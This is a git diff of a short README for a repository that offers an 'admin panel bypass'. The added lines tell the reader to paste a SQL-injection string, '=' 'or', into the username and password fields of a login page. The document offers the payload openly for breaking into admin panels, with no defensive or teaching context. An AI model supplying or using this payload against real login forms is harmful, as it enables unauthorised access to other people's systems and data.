cyberm0n/admin-panel-bypass-code/README.md

 # admin-panel-bypass-code
-you can bypass admin panel simple with this method.
+You can bypass admin panel simple with this method.

+# Usage:
+paste the code on username and password

+# Examp:
+user     : '=' 'or'
+password : '=' 'or'